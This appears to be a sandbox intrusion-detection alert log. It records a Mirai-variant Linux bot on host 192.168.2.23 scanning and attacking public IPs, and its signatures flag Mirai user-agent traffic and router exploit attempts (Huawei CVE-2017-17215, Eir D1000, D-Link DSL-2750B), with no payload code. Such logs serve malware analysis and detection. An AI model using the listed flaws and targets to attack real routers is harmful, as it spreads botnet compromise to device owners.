                            192.168.2.2395.211.72.7449486802027121 10/23/22-17:57:34.509756TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4948680192.168.2.2395.211.72.74
                            192.168.2.23156.224.26.13244288372152835222 10/23/22-17:58:35.150947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4428837215192.168.2.23156.224.26.132
                            192.168.2.2377.56.168.325936075472835222 10/23/22-17:58:32.171744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)593607547192.168.2.2377.56.168.32
                            192.168.2.2346.237.123.11950710802846457 10/23/22-17:57:53.213224TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5071080192.168.2.2346.237.123.119
                            192.168.2.2368.183.20.5556204802841623 10/23/22-17:57:16.524200TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5620480192.168.2.2368.183.20.55
                            192.168.2.23112.161.239.16346156802027121 10/23/22-17:56:58.387449TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4615680192.168.2.23112.161.239.163
                            192.168.2.2388.235.181.25355410802027121 10/23/22-17:56:55.681778TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5541080192.168.2.2388.235.181.253
                            192.168.2.2342.200.190.18251968802841623 10/23/22-17:57:25.783579TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5196880192.168.2.2342.200.190.182
                            192.168.2.2395.173.185.25238478802027121 10/23/22-17:57:18.747060TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3847880192.168.2.2395.173.185.252
                            192.168.2.23112.184.61.16039982802027121 10/23/22-17:57:16.134908TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3998280192.168.2.23112.184.61.160
                            192.168.2.2388.226.149.10748668802027121 10/23/22-17:58:02.198971TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4866880192.168.2.2388.226.149.107
                            192.168.2.23181.208.96.16545410802846380 10/23/22-17:56:55.691471TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4541080192.168.2.23181.208.96.165
                            192.168.2.2395.101.60.17738572802027121 10/23/22-17:57:49.525063TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3857280192.168.2.2395.101.60.177
                            192.168.2.2388.99.248.6960762802027121 10/23/22-17:57:47.237870TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6076280192.168.2.2388.99.248.69
                            192.168.2.2380.24.137.11456988802846380 10/23/22-17:57:43.288432TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5698880192.168.2.2380.24.137.114
                            192.168.2.2380.71.226.18737474802846457 10/23/22-17:56:52.704313TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3747480192.168.2.2380.71.226.187
                            192.168.2.2395.130.243.11357042802027121 10/23/22-17:58:12.780192TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5704280192.168.2.2395.130.243.113
                            192.168.2.2395.100.242.14060258802027121 10/23/22-17:58:15.244265TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6025880192.168.2.2395.100.242.140
                            192.168.2.2395.100.83.16753580802027121 10/23/22-17:57:28.440574TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5358080192.168.2.2395.100.83.167
                            192.168.2.2389.43.31.5457864802846457 10/23/22-17:58:32.908012TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5786480192.168.2.2389.43.31.54
                            192.168.2.23206.238.97.20740734802846380 10/23/22-17:58:39.797960TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4073480192.168.2.23206.238.97.207
                            192.168.2.23178.208.51.13651970802846380 10/23/22-17:57:38.461146TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5197080192.168.2.23178.208.51.136
                            192.168.2.23181.52.121.1442538802846380 10/23/22-17:56:55.685929TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4253880192.168.2.23181.52.121.14
                            192.168.2.235.1.67.6940388802841623 10/23/22-17:57:48.303753TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4038880192.168.2.235.1.67.69
                            192.168.2.23156.234.29.10749996802841623 10/23/22-17:57:16.579158TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4999680192.168.2.23156.234.29.107
                            192.168.2.23197.92.18.12436016802841623 10/23/22-17:57:31.468482TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3601680192.168.2.23197.92.18.124
                            192.168.2.23178.33.180.15156192802846380 10/23/22-17:58:13.127638TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5619280192.168.2.23178.33.180.151
                            192.168.2.2385.17.125.2734058802846457 10/23/22-17:58:37.499647TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3405880192.168.2.2385.17.125.27
                            192.168.2.2395.100.66.14743244802027121 10/23/22-17:57:16.237386TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4324480192.168.2.2395.100.66.147
                            192.168.2.23197.27.9.2474236475472023548 10/23/22-17:58:32.415987TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE423647547192.168.2.23197.27.9.247
                            192.168.2.23112.160.247.15059220802027121 10/23/22-17:57:01.189457TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5922080192.168.2.23112.160.247.150
                            192.168.2.2388.193.147.14457282802027121 10/23/22-17:57:05.148137TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5728280192.168.2.2388.193.147.144
                            192.168.2.2395.129.213.11050132802027121 10/23/22-17:58:17.300669TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5013280192.168.2.2395.129.213.110
                            192.168.2.23189.111.98.2384302675472023548 10/23/22-17:57:25.383642TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE430267547192.168.2.23189.111.98.238
                            192.168.2.2341.84.236.4458066802841623 10/23/22-17:57:28.583889TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5806680192.168.2.2341.84.236.44
                            192.168.2.2388.151.48.19352490802027121 10/23/22-17:57:49.412044TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5249080192.168.2.2388.151.48.193
                            192.168.2.2346.226.104.2650440802846457 10/23/22-17:58:23.986617TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5044080192.168.2.2346.226.104.26
                            192.168.2.2388.49.25.22253704802027121 10/23/22-17:57:31.203571TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5370480192.168.2.2388.49.25.222
                            192.168.2.2385.128.181.24648740802846457 10/23/22-17:57:41.270057TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4874080192.168.2.2385.128.181.246
                            192.168.2.2378.94.95.13033366802846457 10/23/22-17:58:04.249275TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3336680192.168.2.2378.94.95.130
                            192.168.2.2373.36.116.16655264802841623 10/23/22-17:56:55.929374TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5526480192.168.2.2373.36.116.166
                            192.168.2.2337.59.227.5558258802846457 10/23/22-17:57:07.097568TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5825880192.168.2.2337.59.227.55
                            192.168.2.23112.72.41.18337150802027121 10/23/22-17:58:29.927222TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3715080192.168.2.23112.72.41.183
                            192.168.2.2395.217.26.22434290802027121 10/23/22-17:56:46.624349TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3429080192.168.2.2395.217.26.224
                            192.168.2.23164.155.193.23155812802846457 10/23/22-17:56:52.414039TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5581280192.168.2.23164.155.193.231
                            192.168.2.23171.241.31.13659352802846457 10/23/22-17:57:16.952970TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5935280192.168.2.23171.241.31.136
                            192.168.2.2389.56.34.2936972802846457 10/23/22-17:57:43.757423TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3697280192.168.2.2389.56.34.29
                            192.168.2.23206.119.66.23745970802846380 10/23/22-17:57:18.693354TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4597080192.168.2.23206.119.66.237
                            192.168.2.2395.59.128.24235482802027121 10/23/22-17:57:25.848350TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3548280192.168.2.2395.59.128.242
                            192.168.2.23178.128.230.234146802846380 10/23/22-17:58:13.614230TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3414680192.168.2.23178.128.230.2
                            192.168.2.23112.90.175.16846254802027121 10/23/22-17:58:29.972026TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4625480192.168.2.23112.90.175.168
                            192.168.2.2384.247.164.4550144802846457 10/23/22-17:57:18.395660TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5014480192.168.2.2384.247.164.45
                            192.168.2.2346.109.69.25039654802846457 10/23/22-17:58:24.002096TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3965480192.168.2.2346.109.69.250
                            192.168.2.2380.87.225.10358326802846457 10/23/22-17:57:09.723251TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5832680192.168.2.2380.87.225.103
                            192.168.2.23197.25.212.3157758802841623 10/23/22-17:57:11.163825TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5775880192.168.2.23197.25.212.31
                            192.168.2.2395.101.41.23738134802027121 10/23/22-17:57:21.242418TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3813480192.168.2.2395.101.41.237
                            192.168.2.2382.163.67.23150856802846380 10/23/22-17:58:06.232008TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5085680192.168.2.2382.163.67.231
                            192.168.2.2389.106.200.7137496802846457 10/23/22-17:57:41.163628TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3749680192.168.2.2389.106.200.71
                            192.168.2.232.19.151.13534012802846457 10/23/22-17:57:20.946574TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3401280192.168.2.232.19.151.135
                            192.168.2.235.190.73.21537404802846457 10/23/22-17:57:46.324510TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3740480192.168.2.235.190.73.215
                            192.168.2.2388.99.15.8346436802027121 10/23/22-17:56:51.012002TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4643680192.168.2.2388.99.15.83
                            192.168.2.2379.118.143.15746958802835221 10/23/22-17:57:07.465546TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4695880192.168.2.2379.118.143.157
                            192.168.2.2395.70.194.6449750802027121 10/23/22-17:56:58.434241TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4975080192.168.2.2395.70.194.64
                            192.168.2.23200.188.241.14644786802846380 10/23/22-17:58:09.688025TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4478680192.168.2.23200.188.241.146
                            192.168.2.23213.108.249.9655778802846380 10/23/22-17:57:48.551671TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5577880192.168.2.23213.108.249.96
                            192.168.2.2395.129.107.3648562802027121 10/23/22-17:57:38.630374TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4856280192.168.2.2395.129.107.36
                            192.168.2.23178.183.133.18837906802846380 10/23/22-17:58:27.333501TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3790680192.168.2.23178.183.133.188
                            192.168.2.23178.12.185.18435168802846380 10/23/22-17:56:58.275907TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3516880192.168.2.23178.12.185.184
                            192.168.2.2346.17.6.9857472802846457 10/23/22-17:58:05.442861TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5747280192.168.2.2346.17.6.98
                            192.168.2.2341.230.66.23041250372152835222 10/23/22-17:57:33.709636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4125037215192.168.2.2341.230.66.230
                            192.168.2.2395.61.246.10259560802027121 10/23/22-17:57:56.453122TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5956080192.168.2.2395.61.246.102
                            192.168.2.23156.241.118.18548470802841623 10/23/22-17:57:31.972792TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4847080192.168.2.23156.241.118.185
                            192.168.2.2395.154.228.17756888802027121 10/23/22-17:58:07.315986TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5688880192.168.2.2395.154.228.177
                            192.168.2.2395.101.58.14052542802027121 10/23/22-17:56:53.276555TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5254280192.168.2.2395.101.58.140
                            192.168.2.2395.216.148.23446042802027121 10/23/22-17:58:27.444277TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4604280192.168.2.2395.216.148.234
                            192.168.2.2395.9.77.5956230802027121 10/23/22-17:57:21.077046TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5623080192.168.2.2395.9.77.59
                            192.168.2.23192.144.163.18360784802841623 10/23/22-17:58:03.707662TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6078480192.168.2.23192.144.163.183
                            192.168.2.2389.47.56.5233112802846457 10/23/22-17:58:07.871806TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3311280192.168.2.2389.47.56.52
                            192.168.2.2386.245.217.8242670802846380 10/23/22-17:58:35.727279TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4267080192.168.2.2386.245.217.82
                            192.168.2.2380.82.122.18033538802846457 10/23/22-17:56:52.718010TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3353880192.168.2.2380.82.122.180
                            192.168.2.2395.216.194.16335948802027121 10/23/22-17:57:23.604253TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3594880192.168.2.2395.216.194.163
                            192.168.2.23206.78.116.14839206802846380 10/23/22-17:57:40.734862TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3920680192.168.2.23206.78.116.148
                            192.168.2.23213.133.224.13333140802846380 10/23/22-17:56:58.132191TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3314080192.168.2.23213.133.224.133
                            192.168.2.23213.139.84.13934884802846380 10/23/22-17:57:54.130896TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3488480192.168.2.23213.139.84.139
                            192.168.2.2388.221.221.16433512802027121 10/23/22-17:58:05.162720TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3351280192.168.2.2388.221.221.164
                            192.168.2.23178.254.117.18558668802846380 10/23/22-17:58:27.251690TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5866880192.168.2.23178.254.117.185
                            192.168.2.2395.89.4.4241694802027121 10/23/22-17:58:12.771738TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4169480192.168.2.2395.89.4.42
                            192.168.2.2395.129.205.10849678802027121 10/23/22-17:58:30.352051TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4967880192.168.2.2395.129.205.108
                            192.168.2.2366.39.4.2742812802835221 10/23/22-17:58:39.367963TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4281280192.168.2.2366.39.4.27
                            192.168.2.23122.4.212.10541990802846457 10/23/22-17:58:15.321404TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4199080192.168.2.23122.4.212.105
                            192.168.2.23193.28.249.25459992802835222 10/23/22-17:57:04.344271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5999280192.168.2.23193.28.249.254
                            192.168.2.23156.244.197.338410802835221 10/23/22-17:58:21.114648TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)3841080192.168.2.23156.244.197.3
                            192.168.2.2389.39.252.19655016802846457 10/23/22-17:57:41.166469TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5501680192.168.2.2389.39.252.196
                            192.168.2.23213.152.55.249582802846380 10/23/22-17:58:00.630473TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4958280192.168.2.23213.152.55.2
                            192.168.2.2388.94.8.14139860802027121 10/23/22-17:58:09.767578TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3986080192.168.2.2388.94.8.141
                            192.168.2.23103.93.233.10545820802835222 10/23/22-17:57:04.336595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582080192.168.2.23103.93.233.105
                            192.168.2.2382.21.24.17650304802846380 10/23/22-17:58:04.042717TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5030480192.168.2.2382.21.24.176
                            192.168.2.2395.216.249.24643308802027121 10/23/22-17:58:15.238499TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4330880192.168.2.2395.216.249.246
                            192.168.2.2385.208.102.13842900802846457 10/23/22-17:58:17.723277TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4290080192.168.2.2385.208.102.138
                            192.168.2.2383.59.51.2257014802846380 10/23/22-17:58:27.289965TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5701480192.168.2.2383.59.51.22
                            192.168.2.23200.61.47.20333058802846380 10/23/22-17:57:22.414853TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3305880192.168.2.23200.61.47.203
                            192.168.2.2395.230.101.10348538802027121 10/23/22-17:58:05.346267TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4853880192.168.2.2395.230.101.103
                            192.168.2.2374.43.220.2147056802835221 10/23/22-17:58:29.395457TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4705680192.168.2.2374.43.220.21
                            192.168.2.23213.174.237.19051532802846380 10/23/22-17:56:59.845508TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5153280192.168.2.23213.174.237.190
                            192.168.2.2323.78.152.2839192802835222 10/23/22-17:57:58.690532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919280192.168.2.2323.78.152.28
                            192.168.2.23197.26.35.21458358802835222 10/23/22-17:58:16.403361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835880192.168.2.23197.26.35.214
                            192.168.2.2380.82.116.13850362802846457 10/23/22-17:57:14.346537TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5036280192.168.2.2380.82.116.138
                            192.168.2.2338.47.156.7939544802841623 10/23/22-17:57:55.465892TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3954480192.168.2.2338.47.156.79
                            192.168.2.2337.202.2.6733052802846457 10/23/22-17:57:28.782744TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3305280192.168.2.2337.202.2.67
                            192.168.2.2395.86.64.8551606802027121 10/23/22-17:57:56.515557TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5160680192.168.2.2395.86.64.85
                            192.168.2.2395.101.90.3059736802027121 10/23/22-17:57:33.430831TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5973680192.168.2.2395.101.90.30
                            192.168.2.23200.145.71.23549414802846380 10/23/22-17:58:09.690253TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4941480192.168.2.23200.145.71.235
                            192.168.2.23213.216.0.22834688802846380 10/23/22-17:58:33.195693TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3468880192.168.2.23213.216.0.228
                            192.168.2.232.21.240.12346444802846457 10/23/22-17:57:28.770639TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4644480192.168.2.232.21.240.123
                            192.168.2.2395.216.179.12034398802027121 10/23/22-17:58:24.028408TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3439880192.168.2.2395.216.179.120
                            192.168.2.23104.251.238.6636202802841623 10/23/22-17:57:35.552301TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3620280192.168.2.23104.251.238.66
                            192.168.2.23206.214.82.2459664802846380 10/23/22-17:58:39.695808TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5966480192.168.2.23206.214.82.24
                            192.168.2.2352.194.164.20645512802835221 10/23/22-17:57:07.686714TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4551280192.168.2.2352.194.164.206
                            192.168.2.2388.99.36.1733822802027121 10/23/22-17:58:02.118646TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3382280192.168.2.2388.99.36.17
                            192.168.2.232.17.169.20059248802846457 10/23/22-17:57:51.051923TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5924880192.168.2.232.17.169.200
                            192.168.2.235.189.134.839684802846457 10/23/22-17:56:55.096175TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3968480192.168.2.235.189.134.8
                            192.168.2.23200.81.145.11055642802846380 10/23/22-17:58:09.155306TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5564280192.168.2.23200.81.145.110
                            192.168.2.2388.204.163.13051070802027121 10/23/22-17:57:02.607669TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5107080192.168.2.2388.204.163.130
                            192.168.2.2389.248.97.9048108802846457 10/23/22-17:57:38.022296TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4810880192.168.2.2389.248.97.90
                            192.168.2.2380.31.17.5649874802846457 10/23/22-17:58:26.510943TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4987480192.168.2.2380.31.17.56
                            192.168.2.23206.210.111.25441284802846380 10/23/22-17:58:36.878015TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4128480192.168.2.23206.210.111.254
                            192.168.2.2389.161.241.15233598802846457 10/23/22-17:57:38.016631TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3359880192.168.2.2389.161.241.152
                            192.168.2.2389.158.104.19756618802846457 10/23/22-17:57:38.026305TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5661880192.168.2.2389.158.104.197
                            192.168.2.2372.32.131.2447166802841623 10/23/22-17:57:11.261983TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4716680192.168.2.2372.32.131.24
                            192.168.2.2395.107.208.18041452802027121 10/23/22-17:57:21.052771TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4145280192.168.2.2395.107.208.180
                            192.168.2.2395.65.51.20445258802027121 10/23/22-17:57:13.026267TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4525880192.168.2.2395.65.51.204
                            192.168.2.2395.100.184.17750644802027121 10/23/22-17:56:53.267528TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5064480192.168.2.2395.100.184.177
                            192.168.2.23200.53.139.11446620802846380 10/23/22-17:57:13.964930TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4662080192.168.2.23200.53.139.114
                            192.168.2.23206.123.118.14037914802846380 10/23/22-17:57:40.679711TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3791480192.168.2.23206.123.118.140
                            192.168.2.2391.92.129.10059522802841623 10/23/22-17:57:57.973921TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5952280192.168.2.2391.92.129.100
                            192.168.2.23156.229.201.7949602802841623 10/23/22-17:58:11.633000TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4960280192.168.2.23156.229.201.79
                            192.168.2.2386.123.49.20149264802846380 10/23/22-17:58:19.952008TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4926480192.168.2.2386.123.49.201
                            192.168.2.23181.214.9.3141092802846380 10/23/22-17:56:55.612964TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4109280192.168.2.23181.214.9.31
                            192.168.2.2388.221.201.14334814802027121 10/23/22-17:58:17.358396TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3481480192.168.2.2388.221.201.143
                            192.168.2.23213.32.16.9953078802846380 10/23/22-17:58:33.195816TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5307880192.168.2.23213.32.16.99
                            192.168.2.2395.101.14.7040732802027121 10/23/22-17:56:58.439299TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4073280192.168.2.2395.101.14.70
                            192.168.2.232.19.132.9958388802846457 10/23/22-17:57:07.232331TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5838880192.168.2.232.19.132.99
                            192.168.2.23195.201.23.5638570802846457 10/23/22-17:58:30.729268TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3857080192.168.2.23195.201.23.56
                            192.168.2.23213.112.181.21934426802846380 10/23/22-17:56:49.792313TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3442680192.168.2.23213.112.181.219
                            192.168.2.23156.242.132.8155596802841623 10/23/22-17:58:37.853344TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5559680192.168.2.23156.242.132.81
                            192.168.2.2395.216.53.11044988802027121 10/23/22-17:57:28.459897TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4498880192.168.2.2395.216.53.110
                            192.168.2.2389.29.194.24133250802846457 10/23/22-17:58:32.905329TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3325080192.168.2.2389.29.194.241
                            192.168.2.23168.181.187.25454136802841623 10/23/22-17:57:16.449081TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5413680192.168.2.23168.181.187.254
                            192.168.2.2389.33.237.14935768802846457 10/23/22-17:58:32.888660TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3576880192.168.2.2389.33.237.149
                            192.168.2.23178.242.183.5448310802846380 10/23/22-17:57:29.196463TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4831080192.168.2.23178.242.183.54
                            192.168.2.2382.194.104.22949784802846380 10/23/22-17:58:06.153292TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4978480192.168.2.2382.194.104.229
                            192.168.2.2388.221.240.8948366802027121 10/23/22-17:58:36.463499TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4836680192.168.2.2388.221.240.89
                            192.168.2.2395.216.179.4142042802027121 10/23/22-17:56:48.803851TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4204280192.168.2.2395.216.179.41
                            192.168.2.2345.135.122.3860300802841623 10/23/22-17:57:46.472229TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6030080192.168.2.2345.135.122.38
                            192.168.2.23188.138.163.22451372802846457 10/23/22-17:57:00.253988TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5137280192.168.2.23188.138.163.224
                            192.168.2.232.218.110.5346692802846457 10/23/22-17:57:50.386273TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4669280192.168.2.232.218.110.53
                            192.168.2.2395.124.247.656950802027121 10/23/22-17:57:34.925735TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5695080192.168.2.2395.124.247.6
                            192.168.2.2385.17.140.1638068802846457 10/23/22-17:57:41.186656TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3806880192.168.2.2385.17.140.16
                            192.168.2.23188.226.242.2847018802846457 10/23/22-17:57:47.809135TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4701880192.168.2.23188.226.242.28
                            192.168.2.23213.188.195.18451004802846380 10/23/22-17:57:18.575363TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5100480192.168.2.23213.188.195.184
                            192.168.2.23112.124.66.5838904802027121 10/23/22-17:56:58.157811TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3890480192.168.2.23112.124.66.58
                            192.168.2.2388.199.88.13848756802027121 10/23/22-17:57:21.093414TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4875680192.168.2.2388.199.88.138
